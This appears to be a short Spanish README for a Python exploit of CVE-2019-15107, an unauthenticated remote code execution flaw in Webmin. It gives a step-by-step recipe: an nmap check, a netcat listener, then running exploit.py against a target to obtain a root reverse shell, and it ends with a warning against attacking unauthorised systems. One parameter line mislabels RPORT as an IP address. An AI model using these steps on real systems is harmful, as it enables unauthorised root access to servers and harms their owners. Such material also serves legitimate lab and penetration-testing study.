
CVE-2019–15107 - RCE no autenticado en Webmin <=1.920
Este script de python debería darte un shell de root en Webmin 1.890
Comprueba con nmap:
nmap -sC -sV -p 10000 TARGET_IP
Resultado:
10000/tcp open http MiniServ 1.890 (Webmin httpd)
Cómo usar este exploit:
Paso 1:
nc -lnvp LPORT
Paso 2:
chmod +x exploit.py
./exploit RHOST RPORT LHOST LPORT
RHOST = the target
RPORT = the target IP address (Usually 10000)
LHOST = your kali box
LPORT = your reverse shell port
Paso 3: ¡Obtén un shell de root!
¡¡¡NO DAÑES SISTEMAS NO AUTORIZADOS!!!